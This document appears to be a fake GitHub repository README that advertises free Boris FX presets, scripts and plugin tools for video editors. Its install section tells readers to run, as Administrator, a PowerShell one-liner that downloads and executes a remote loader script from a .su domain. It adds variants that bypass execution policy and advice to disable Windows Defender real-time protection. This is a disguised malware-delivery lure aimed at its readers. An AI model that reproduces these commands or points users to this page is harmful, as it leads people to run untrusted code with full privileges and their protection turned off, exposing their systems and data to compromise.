Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 

Repository files navigation

Boris FX VFX Tools & Presets Repository 🎬✨

Welcome to the ultimate open-source repository for Boris FX software enhancements, presets, scripts, and workflow automation tools. This repository is designed for VFX artists, video editors, and motion designers looking to speed up their post-production pipeline in Adobe After Effects, Premiere Pro, DaVinci Resolve, and Avid Media Composer.

πŸš€ Supported Boris FX Products

  • Sapphire Plugins: Custom lens flares, lighting effects, and transition presets.
  • Mocha Pro: Advanced planar tracking data, rotoscoping setups, and lens calibration files.
  • Continuum (BCC): Title studio templates, particle presets, and image restoration utilities.
  • Silhouette & Optics: Cinematic color grading look-up tables (LUTs) and rotoscoping scripts.

🎯 Key Features & Keywords

  • Boris FX Presets Download: Free community-driven effects and transitions.
  • VFX Automation: Python and JavaScript scripts for Mocha Pro and After Effects integration.
  • Cross-Platform Compatibility: Workflows optimized for Windows and macOS.
  • Tutorials & Documentation: Step-by-step guides on how to install and apply BorisFX macros.

πŸš€ Direct Download

Read Readme.txt before install!


πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://software-storage.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://software-storage.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://software-storage.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.